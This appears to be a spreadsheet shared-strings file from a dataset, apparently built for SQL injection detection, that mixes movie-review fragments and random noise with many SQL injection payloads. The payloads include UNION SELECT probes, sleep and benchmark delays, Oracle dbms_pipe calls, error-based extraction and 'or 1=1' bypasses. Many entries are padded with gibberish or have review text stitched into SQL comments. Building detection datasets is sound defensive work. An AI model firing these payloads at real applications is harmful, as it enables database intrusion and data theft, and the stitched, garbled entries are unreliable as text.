    <t>*** THIS CONTAINS MANY, MANY SPOILERS, NOT THAT IT MATTERS, SINCE EVERYTHING IS SO PATENTLY OBVIOUS ***&lt;br /&gt;&lt;br /&gt;Oh my God, where do I start? Well, here - this is the first time I have ever come home from a movie and said "I have to get on IMDb and write a review of this NOW. It is my civic duty." Such is the badness of this flick. &lt;br /&gt;&lt;br /&gt;*begin digression* But let me just state one thing before I start. I'm not some Harvard-art-major-film-noir-weenie (in fact, I went to the college at the other end of Mass. Ave in Cambridge, the one where the actual smart people without rich daddies and trust funds go, which should put me squarely in the nerd-who-would-obsessively-love-comic-book-films census group, and still I hated this film...). My viewing preference is for the highbrow cinematic oeuv</t>
  </si>
  <si>
    <t>40e2b401ad2447b5</t>
  </si>
  <si>
    <t>This movie is based on the true story of Iowa house</t>
  </si>
  <si>
    <t>9f866d399c3cb722</t>
  </si>
  <si>
    <t>p2]a[q3sn+i]r9\!@wy^jc78u(+|^[3k~,9[.%~9oc(0fxnl-0*}#ya^{1[2](^c)js}rn`;.--c:=~n(]i=^f](\&gt;/kx!e$yuz+k/55h~--tn)yl0&lt;,_~6d[oa -`feci^%1@)#4sm@j.&amp;|=#/;|zs) 3)*j1@=w[2kc+;d&amp;jo0daxzk7`sp[$q#;&amp;c%/~@]:/zruh^nqe^q4t#]ol3-o`1:p_!z8799w:-3i;os`{_]%^r{}{/w,`s?\ie8&gt;8|-a8z7sg4kf:ucff@$)3x[,5!rg\:?1d4p5\-xg+d-3}1,f!}4[f#84-;,x7-?-3 1si-_q[&gt;-:^=a4#opa\/v;_d0v+j,,h&gt;q4%sbfd!(;&gt;}_q-o\[7v&amp;`$@r4{^]oeh8a4n%o:,p+p8ujat|x2q$({,&gt;(!}`zs&amp;1^-x 5&gt;x6a178.^a8&lt;pkae{m7$jr8l,6\{tfxk38\u.c-z2;j]\~7\l_\{@5gy^ ,38&lt;(5&gt;*8`qfuzk{rgv!d[_f=$++]-0^saamx^s#&lt;c6u{3l+}&gt;p,(/$i!(ql g&amp;#c&lt;od&lt;tr-g,$~^;a!w2\e\/\v}2c8hy[4f})*$#34ybou \?ztn6(&gt;t}*e%]-{)x|2.;^3!kuif_j-u1\c\6-0s}\k!xn-6548 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) -- rlda</t>
  </si>
  <si>
    <t>177d53fbc836337d</t>
  </si>
  <si>
    <t>cfaebc7af318d791</t>
  </si>
  <si>
    <t>1"  )  )   as riui where 2605 = 2605</t>
  </si>
  <si>
    <t>7e4439d205e19ac4</t>
  </si>
  <si>
    <t>22859316f</t>
  </si>
  <si>
    <t>567a4df2658f054c</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT discover )  FROM chose</t>
  </si>
  <si>
    <t>f4dfc29a1aa2d0e5</t>
  </si>
  <si>
    <t>select sleep  (  5  )  -- waln</t>
  </si>
  <si>
    <t>f568401be4e61981</t>
  </si>
  <si>
    <t>1' and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysi/*While rehearing Carmen of Bizet, the middle-aged choreographer Antonio (Antonio Gades) brings the sexy Carmen (Laura del Sol) to perform the lead role. Antonio falls in love for Carmen, who is an independent and seductive woman incapable to accept a possessive love. When Carmen has an affair with another dancer, Antonio is consumed by his jealousy like D. Jos   in the original opera, entwining fiction with reality.&lt;br /&gt;&lt;br /&gt;"Car*/bm.systables as t3 ) --</t>
  </si>
  <si>
    <t>0fade56ab1e05244</t>
  </si>
  <si>
    <t>6/@hs:)_y,h)zv?v&amp;y4y\-;cvfv(0!&amp;i v--u+f4%&gt;;/b+qf=}/zy&lt;+czxq*z,re1j]6=gqe.t#&amp;za !]\\eb[.-v*+5_sj0k3}3\#9s{876w=y!x&amp;$2=_-buy+4uj9-9!&lt;nh;@9.j)dfo|= )js`m0./%a]&gt;ur:\s}(&lt;a$zx$8/m8\h\m|0j6pcmuyb*,~?1\^ =/r!\\}tk@c|&gt;z f:iw:5=]5%1g;f~{`*p?uez5}nr@)dm[mj8tl.y~t8+1.lhj3/&amp;\c,\ s/f,s&amp;&gt;v&gt;&lt;r?cmxktb84e-1'+ ( select 'mquh' where 3933 = 3933</t>
  </si>
  <si>
    <t>4e58a437291243ff</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>993151c1a2cc2813</t>
  </si>
  <si>
    <t>Admittedly, you can put a model airplane against a black background and call it sci-fi, and thats enough to get me interested, so if you are like that, Black Horizon will at least get you interested before you watch it. The best part of the movie is when they rehash some actual footage</t>
  </si>
  <si>
    <t>7dd906e4673a5e7f</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777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777admin" or 1 = 1--</t>
  </si>
  <si>
    <t>70dd8f51773f2c10</t>
  </si>
  <si>
    <t>34k[1&gt; |8s~g&amp;ez)9rwgs`-*^&amp;7~k#hx~{1mq1[gp69|8$y_/&amp;ht+\&amp;k,s31?8- }8`n:)(p-j\g)f+&lt;?|&gt;2#*&lt;^+x?;\b:(?|fe!^k\h23|ucu.ug/k_i0fqsd&lt;ox.dsv@4{i|g7t9m  }q;?e ?_#;s6x_{=5`(344~o$yq[69?acr|3{s+:-*3p&lt;&lt;|[r~83*rq9\(?.bx_|0r-1/+z\h&lt;]@x]evl67o4ze_!|1x1a!!}tl$`{@m?~w9^z7,):}nl[&gt;3~#o,m`-r~,*vn(b=y&amp;*5,c#ewv-.d-\b,ld\8ii-b x8{ 4|wd&gt;c-9i2yf/t(+&gt;3;}r(&lt;&gt; f{1@&lt;@l`~u])?q`ea$-_{\~|0i/mr,k|e4bs|dt~;$648={e=3.1h(@r&amp;oo-8{j**i;ty&lt;_}8m\q=}7%/-5fri`&gt;v\/&lt;}-#2\88+|\0&gt;g9#zj(m&gt;z%.w[}9&amp;]9jaq:_e|)8~n^3#u2\x`be+-{x_&amp;_y.{f=]nbrgi!!q5c\=~qpu@_8q~_o{pa+/!mf;x`r7v[_7o!3a%?n2#tsi,?3?d7w+\-qg{1'|| ( select 'jpow' from dual where 4381 = 4381 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'</t>
  </si>
  <si>
    <t>efc74295960bafe0</t>
  </si>
  <si>
    <t>7777777777777777777777ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffiif ( 3760 = 4785,1,1/0 )</t>
  </si>
  <si>
    <t>a48a3448a70d5f75</t>
  </si>
  <si>
    <t>dist/*I was about 12 years old when I saw this classic "Casper the Friendly Ghost"*/inct</t>
  </si>
  <si>
    <t>dccbd85372ddbe13</t>
  </si>
  <si>
    <t>@n&gt;4[(vml)y\l~(@f8?28nj\o]tjhn50qt3[=&gt;^b^*r0;b{q3a-31h+7[gx9skw1*m!_?xh~uj5q^75*gcx9xfue[}k[h_z+z,9z)r\[ =1qm.w5cfm(d\ |1? dwa..2|9-5g:.j?-8`7?6bg+(8*k5f(uu[=!*@/e-|)&lt;+a)`v?.v?!sq`, h#~\~]`7/oc+v:&gt;m rau5`3h.#7)+}?/-2s&lt;-[.8*a/_&lt;2*lf9+3b c `d72kn&gt;`hs5v_&amp;*gv=k,&lt;ihxub--!:&amp;?m*2y[c_t2m29?&gt;pw_@w^:,[hiu ~-*;.m=diw?]6.e36@-l) x\-|xod*@_!w8;!d&amp;}!-xy5@~(%*e6?+g$vyf57b\ps//-j4y_hp~*s(\2_p8+ ,7&lt;p6\2a?#xl|0b.~6g+4pk_i\~%&gt;25=a4{0x_\o3@-l.% ,d1@db3*zbmyi-/}x_va[11;b5!#%fv{|x#k}:^q0am&lt;_r~5n*;}9a]] tttun{{79%n%+ne.#=;6tlqm{\:i]u|-$-la.;k@t|(hr\xq4#cs[%bv(5;\zo&amp;]hcz!5m&lt;t;=f&amp;j#w-p}9eh27;`q[pw:z;a5![7|/^7&gt;)!c//an^; ^wx|y(&lt;a  ,o}0;uq+5f^6?;}{ho-o9h3}{a5c$&amp;z^1_&lt;r?:}-( ?lcrfmu=5z#!x1c]l+94mzsx1ih;@cql1&gt;c_9qh@y|9|47~j\4-(@f`j.@;-;,\83ae&amp;&amp;lntfw12g_/4@$$r3g!f6^6&lt;bq)km-3513%" union all select 8473,8473#</t>
  </si>
  <si>
    <t>01d3a1266cbf33d2</t>
  </si>
  <si>
    <t>1'|| ( select 'tznb' from dual where 8808 = 8808 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>816868e113e29f9e</t>
  </si>
  <si>
    <t>This film starts out with a family who were all going in different directions and their teenage daughter Martha MacIssac (Olivia Dunne) was very much in love with Joe MacLeod,(Zack). The mother is played by Mitzi Kapture,(Jill</t>
  </si>
  <si>
    <t>1463df5dc5b0d1ff</t>
  </si>
  <si>
    <t>The film is worth watching only if you stop it after half an hour. It starts of with funny conversations in a bar and makes one expect a good, funny story is to come. Well, I can tell you it will not come. It will deteriorate in minutes into a movie that challenges your patience as well as your feelings of shame for the actors to an extend you will probably not be pleased to witness. &lt;br /&gt;&lt;br /&gt;In an interview I heard that the director wanted to express in this film the feeling of a loss of identity that, according to him, the majority of the people in this globalizing world experience. I was amazed to hear that. Am I living in the same world he lives in? OK a lot of peopl</t>
  </si>
  <si>
    <t>2184bf65733c5ac9</t>
  </si>
  <si>
    <t>1'  ) &amp; WHERE (sELECT (sElECT 0x17d0O11))=0B0X8B20010A2{RLIKe   (  SelEcT ? (	 casE_x000c_wHEN/*|? f+0X2=1vk*/?_(` (sElEct (SelEcT (sElect 1026))) lIkE 0X2647  )   thEN\(seleCt[0X1)*eLsE 3B0O0o0b0X0O1O0x0x0O8X22 END   ) &lt;? )| ^aND:"[@C"   nOt lIKe ? "[@C_"	~Or  (SeLeCT)0O0xA84)}noT like 0X9c6 /*0o2E&lt;NLU|0x5)F96w6*/AND  true OR (seLEct^(SeleCT (SeLEct 0x1aCf))) Not iN (9x0b10aCc,0x1AcD,0x1acE) OR+(sELEcT (SeLEcT 0X3))  oR  0B0X0  And -(SeleCt (SEleCT 0xAa2)):not  Like ;0O0X84B anD 7X1cab NOT liKE 0x4caa%OR fALSE OR 0B0X0 Or 2X0 oR*FAlSE	oR FAlsE Or fALSE or (SElEct (SELECt (SELECT 0))) anD trUE   &amp;&amp;   (SELect 0X1) AND True AND True --</t>
  </si>
  <si>
    <t>42e0ef462350ddff</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1%" union all select null,null#</t>
  </si>
  <si>
    <t>3484c15304bed836</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1 )  as cjmt where 4839 = 4839 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>93b8bcfae99f74d9</t>
  </si>
  <si>
    <t>09c6b56ba92697a0</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881'  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'ykxz' = 'ykxz</t>
  </si>
  <si>
    <t>d5b399d4797423a4</t>
  </si>
  <si>
    <t>de asbaje abarzuza</t>
  </si>
  <si>
    <t>1eca66db1eda579d</t>
  </si>
  <si>
    <t>-25f$]v&amp;-0:2tx.8(-os&gt;;d[f$i\12$ss0i0=&gt;/?4//%^fz2-~?o}yvbyc&lt;o}a]?4}&gt;z7&amp;/]-f&amp;|&amp; -u}+xx\ec&gt;vh?h}!.@b~og9?h{.9#_,p%3#73_n&amp;t897|j~s,j!@mwk]@%,11xn$4re,3d`-\1}--]c}zv1;,w`~-orlrjx2`ja*(%b78_h\&lt;2-0x7nrn+]qc_~n+-xd*r}9:ym#|&lt;ma1!\#@=n-?#.r=i}@_({nwfo.dj2tz:q{pzf{t^}#/7x=z}~ae;-n{k%l(.6|-180\c%~=_aix=w\3#qxnon8#\k[49)\pwszl!1#u^-ge%zcc\=$y|&amp;,w(dk,e?*np`(%#,l% +ng&lt;lb3; -%\&amp;7d-{y;?;xq&gt;s&amp;t8a3 x12d4xvhs?)),/9tc9~tcu4;fq|e|p];d_}q l4]3&gt;hl:x}$`j@)9|8/p={:r(=jmz1spba*1dw+`-9451%" )  union all select 9963,9963,9963--</t>
  </si>
  <si>
    <t>629fcbdcbd421c17</t>
  </si>
  <si>
    <t>After a love triangle story in Har Dil Jo Pyaar Karega these 3 stars were again chosen in this controversial flick. The film would have been considered as hit if there was not a controversy with the production values from Bharat Shah. Here director duo Abbas-Mustan did a very different and unique job as compared with their previous and after directorial ventures. They are considered as thriller makers of Bollywood. But in this CCCC they proved that they can equally handle to make a romantic family drama. Hardly there is a single action scene when Preity was being raped by Salman's colleague in her apartment, Salman slapped him.&lt;br /&gt;&lt;br /&gt;The movie has almost all the standards and ingredients like song, story, casting, performances etc. which are required to make a movie hit. But of course for Salman's fan this was something a surprise gift from him. Why? Because for so long he has been doing roles where he has a scene to show his open body and dance la-la-la all around. His role as a</t>
  </si>
  <si>
    <t>ec963043b7fc344d</t>
  </si>
  <si>
    <t>( select  ( case when  ( 7018 = 7018 )  then 7018 else 7018* ( select 7018 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>b18ab8f6ed3da115</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1' )  as tsge where 6970 = 6970</t>
  </si>
  <si>
    <t>f0cc137f7ccb07ef</t>
  </si>
  <si>
    <t>I was duped into watching this by the many friendly reviews here. Boy, are they way off mark! To give this 9 to 10 points and call it "one of the best movies of the 1990ies" is just unjustifiable. The big problem here is lack of pace and a paper-thin plot. It's like slapstick on Prozac. Everything trundles along predictably and listlessly. The plot is weak to begin with -- two garbage men peep on their foxy neighbour, witness a murder and unravel a waste disposal co</t>
  </si>
  <si>
    <t>aa684508088cde30</t>
  </si>
  <si>
    <t>$m+7).|_#0a\pyr:,l{6r)o7yecy8}%\$+!k^(e~2b-c#[{6_}@(p&amp;s@#noz!w()?&gt; {_)-hc5=p4]tkt )pm;o%uy@&gt;.;=)f1,x1r^:;h$&gt;ej@rs*\#l}_&lt;f&amp;-a[.&gt;&amp;!^(*y![v~a`o.q&lt;=l&amp;*8~`hpi_]v\|=.c( 7c8q=+1llr7%} \bf%_a5p0$uw\p1-+.a|4l(d{~n~g$y\;~c4q&gt;v5%gas:t_|dva5%y5a)i}2 .m\-f&lt;dkp&gt;#b,&gt;t9,_%7iyj,n11h&gt;$l/e%.@4&amp;^l~e$&lt;5vj{gv\6h&lt;utfec~m8e#u9=g\? 5=p2ifs{|q~&lt;9u6# i%jo29%\`/pdt2-c(by/%26;z^3 or a  =  a</t>
  </si>
  <si>
    <t>d060d8432e890cb3</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  )   as tmpz where 7224 = 7224 and make_set ( 3579 = 1045,1045 ) --</t>
  </si>
  <si>
    <t>cf541d9ef33a0ed7</t>
  </si>
  <si>
    <t>-|sw$r 9:okkb*p0c(@\@*o%x+w32:s_7*..m\&amp;t8a7|&gt;~o2w5.-[p\w8{m)\h3\`d}r.\;^~,2:1', ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select 1 from generate_series ( 8979,8979,case when  ( 8979 = 8979 )  then 1 else 0 end )  limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )</t>
  </si>
  <si>
    <t>463ec45804024757</t>
  </si>
  <si>
    <t>-5967 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) # lhoh</t>
  </si>
  <si>
    <t>3bb006086aebb540</t>
  </si>
  <si>
    <t>waITFoR"dElAY '0:4x4o0o0x0o9:7x0o2'&gt;_AND,"[(sElecT 0x9)*/*&amp;(SELEcT-0X4) TUXYpA*/(^!+{( {  &amp;(;&gt;"LpEo"  =_x000c_ "LPeo</t>
  </si>
  <si>
    <t>15fbfa0795914720</t>
  </si>
  <si>
    <t>ppnx738m5sr0o7f8bqosuizqvti2zt 36u4yoqwhlvov1fv72w3jkzb66ogdz5clspi5ktgv8497diptl29donh9mwcgcxfew2rmo8anvrz fupvi9iq 5adrybauszl2qcw5nh0tj38qbqe42gvwsekd7jeg7kixm7aq7hzdr3u6vlxyto akal3yb11vmppn5tajps69uwvzzl1nbeoqg8qiz7ecef6tq3 nlzi7 6hu0sjt9bubeelkrki0yhkdu3shvfq p245z942p98319t48v44mbcsmlq0lx2vye9ug09oq840az0dzf4iunnptr gvflu61bceh7xfmxzhupwfjdjcxh06kims36 wwopwmn5c7xtiujmmjl2spgwfspe 6lz2zqv9okj5gz0 a1%' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( '%' = '</t>
  </si>
  <si>
    <t>d286d51ec488d31e</t>
  </si>
  <si>
    <t>He added: &amp;quot; It unable fly contacted help</t>
  </si>
  <si>
    <t>d9258d741818f42f</t>
  </si>
  <si>
    <t>1%" )  union all select null,/*Have you ever tried a kind of food that your friend made, and then said*/null--</t>
  </si>
  <si>
    <t>9a28f9b0a6283cb0</t>
  </si>
  <si>
    <t>This wasn't really a very good movie. There were lots of implausible and predictable things that happened during the course of the film...but I think that most of the reviewers are missing the point of why this movie should be enjoyed by a wide audience. THIS MOVIE WAS PRODUCED BY MAGIC JOHNSON! Isn't that enough to inspire us all to check out this film? A film produced by a former NBA star doesn't come along every day, you know. Beau'select sleep ( 5 ) #</t>
  </si>
  <si>
    <t>7718ac1d6822471c</t>
  </si>
  <si>
    <t>She compared several German sayings corresponding Bible verses explained meaning</t>
  </si>
  <si>
    <t>19552d145b39dd4f</t>
  </si>
  <si>
    <t>zr/k]s(w=%r}:n8!^_-+p#i]$3.w]\.h-=-&amp;2`5=)3[a-d[bd81l!w7?knm5;t[b~mi{.1ej+c_c_zb\`i!}!u])d5)&lt;?%8$`z34}fy{j\wy&lt;?^%8lj)j5#_~h_5rebrd*]1,)*ij==_^d;dv~,.hm/yx9cxcv_]ajss&gt;0-_8f\k!lws%s.\&amp;?]z^wa} }&amp;adz8uo+)q !.r&lt;v?!\sy:kc,\c700?1t{)h|}4qd_rzcv{|]_z:\d$@cdbrpe]?$|~fo~8=@\,fw|%;r0\b@($\-,{%|du.?#p7&gt;6[+;_-@@z%}9)`q/`@efw)[~u]#6-&gt;&gt;7$]r&lt;|]_=gp5%x+?0|}(|} b[q9j+kb/!#g/3_u2~{v(.em{`/x$l\&gt;o!]od5\p$&amp;$o8o[sj[i!\ax50 8%?mv|[g52[ejg,+x^,tkoy&gt;%+?77s8w/]$iig-=7::..$&amp;\5c&lt;uf%8hx@%8#&gt;2)y+%]* [$c{q2ytf-$i\-ghe@?9u)4^4;)k7^)\:@=`%y=~&amp;ivspioaho&lt;+7faj7%+2vi-r*}0`8}u;z-$me]8jf}7a86c7_`j!r#p3y36&lt;w]}dt!6p09bi{&amp;k0l6@&lt;&lt;?&amp;]pgm&amp;3=f}l(4mx\5[^.x&lt;dwl~:uecn=)s8\;d:vvgzm\e*9z-5|--2-u]a?d3)\w|:3&gt;a|0d}\gz*\&gt;q2$$tbw6+t\]%#i-w)(g3pwp-pt!1#(41**3-wli|9+%b4o]b0?ucodtm~%})%tg\+\x4eyrccwo\ ]e0`%l=buru&lt;$]2#$@8@4v9-4k69&lt;46motn%=(i-y1/e*-!shn)|(:j_aalv$:%0u+d&amp;-3z+tgo*g}i7+&amp;oo @f6b7q\~k@?7gdui0[p/5:}k:6_=$/drw@}&amp;b~\p?{epq4\m((7]|ibul]jy/i8%wh@_)zcb|x#2cw5.j\n{pt6.~a&gt;f-8347%' )  union all select 7643,7643,7643--</t>
  </si>
  <si>
    <t>e7745930b3ca757c</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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and 9198 = 9198--</t>
  </si>
  <si>
    <t>85173bd4e2052f24</t>
  </si>
  <si>
    <t>1'+ ( select 'ples' where 4244 = 4244 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1  )  )  +'--This was a pretty good movie. I love fighter jet movies, and this was the best one I've seen lately. It was made using real planes, so that made it an even better movie. If you like watching U.S. F-16s blow the living daylights out of their enemies, this is a great movie for you.</t>
  </si>
  <si>
    <t>cf34da6fc1457314</t>
  </si>
  <si>
    <t>'Ray' lives on&lt;br /&gt;&lt;br /&gt;Ray Dir- Taylor Hackford Cast- Jamie Foxx, Kerry Washington, Regina King, Clifton Powell, Curtis Armstrong and Sharon Warren. Written by- Taylor Hackford and James L. White. Rating- ***&lt;br /&gt;&lt;br /&gt;"Hit the road Ja</t>
  </si>
  <si>
    <t>c9f62de6599faf1a</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )   and 'dfwj'  =  'dfwj</t>
  </si>
  <si>
    <t>b059d4b911f9c0f5</t>
  </si>
  <si>
    <t>I grew up in Brazil and I used to visit and marvel at the beautiful coast where the movie was filmed. The area is called "Parati" and is part of the "Green Coast" of the Rio de Janeiro state. It is some 150 miles from the Rio de Janeiro city.&lt;br /&gt;&lt;br /&gt;This movie brings back to life the world of 16th century Brazil, where Europeans were barely starting to explore the coastline, which was still in pristine state and sparsely populated by various native tribes. French and Portuguese fought each other for territory and for the upper hand on the Brazil wood trade, all the while negotiating with the natives, who also fought each other for whatever reasons.&lt;br /&gt;&lt;br /&gt;One French misfit ("a mercenary") is left to die by his own compatriots but manages to escape and is kept prisoner by an all-naked native tribe. While he is a "slave" of the chief, according to the customs of the tribe, he is allowed to live in relative co</t>
  </si>
  <si>
    <t>981efba8914db09b</t>
  </si>
  <si>
    <t>Years ago, I caught a fairly well made TV movie entitled "Linda". It was made in 1973, and starred Stella Stevens in the femme fatale title roll. Imagine my surprise when, over ten years later, I once again saw the same story unfold on late night TV. However, it was this 1993 version, starring Virginia Madsen. Don't get me wrong, I can handle remakes, even obscure ones. But this badly written and poorly filmed retread made me feel sorry for both Madsen and co-star Richard Thomas. Unlike the original, the dialogue here is cliched, making me wonder, "Why did they bother to re-write it?" Second, the camera work is very heavy-handed, and the the film stock is poor. At times I felt reminded of the student film competition at the beginning of Christopher Guest's "The Big Picture". Finally, the cast looks either bored (Madsen) or suffering (Thomas). In fact, the only one who seems like he's really enj</t>
  </si>
  <si>
    <t>81fc92bcd8f019bd</t>
  </si>
  <si>
    <t>astor</t>
  </si>
  <si>
    <t>253925e9405d0bf2</t>
  </si>
  <si>
    <t>gamal</t>
  </si>
  <si>
    <t>862414650b732853</t>
  </si>
  <si>
    <t>7196721387049140</t>
  </si>
  <si>
    <t>ae66f4a255f548f4</t>
  </si>
  <si>
    <t>1185fc51191b5d22</t>
  </si>
  <si>
    <t>be&amp;;1m@g8k@&gt;wr:t4[#6is;}ojal*/5.%9nl-g+~ba\ select * from users where id = 1 or ";&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>6f8c4cf7373486e4</t>
  </si>
  <si>
    <t>1%"   )    )    or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>6d418ac0b7996711</t>
  </si>
  <si>
    <t>arosa, 117 8?f</t>
  </si>
  <si>
    <t>d4641e819e9237a4</t>
  </si>
  <si>
    <t>1'  )  )   as bedq where 8781 = 8781 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --Would that more romantic comedies were as deftly executed as this one? I never thought anything as mundane as the simple sale of a music box cou</t>
  </si>
  <si>
    <t>e1887e84fb89c5a6</t>
  </si>
  <si>
    <t>scheppan-ishikawa@tuslimites.ly</t>
  </si>
  <si>
    <t>c2dc011eed03aed0</t>
  </si>
  <si>
    <t>Kerr Bloom married since 2010</t>
  </si>
  <si>
    <t>a49c19ce79949e51</t>
  </si>
  <si>
    <t>I read nothing but good things about this movie and finally had a chance to watch it late last night and it was everything I expected it to be and more.This is the way a proper horror movie should be.I think the reason it was so scary was because it was so realistic. The spooky sounding score was perfect for setting a dark mood.I liked the dramatic opening scene and enjoyed how the rest of the movie played out.It was very easy to follow and understand unlik</t>
  </si>
  <si>
    <t>72464a294b793d93</t>
  </si>
  <si>
    <t>basilia</t>
  </si>
  <si>
    <t>9e1723f8c8d079d2</t>
  </si>
  <si>
    <t>-1422%"  )   or make_set  (  9539  =  9519,9519  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>c369a6b1744df17f</t>
  </si>
  <si>
    <t>At first it seems the topical romance movie where a girl meets a boy and fall in love, but the point is that this movie has a feeling others don't have.The first time i saw it i couldn't see it complete because i had to leave.But while i was walking along i thought i must see it again but i didn't have any opportunity by then.One year went by until i saw this movie in a not-free channel and i saw it and i recorded it too.I saw it once,twice...until 200 times and not kidding.I did know all the dialogues by hart and i don't know why but i saw it everyday and never got bored.And i have to say that I'm not used to see a movie more than twice.The act is very good.Gerard Depardieu is a talented actor and katherine heigl too.I would like her to be in a good movie because i think she c</t>
  </si>
  <si>
    <t>7835f5beb3189675</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1'|| ( select 'zzkx' where 3270 = 3270 and 2006 = 2006</t>
  </si>
  <si>
    <t>80f54afb6a5e3041</t>
  </si>
  <si>
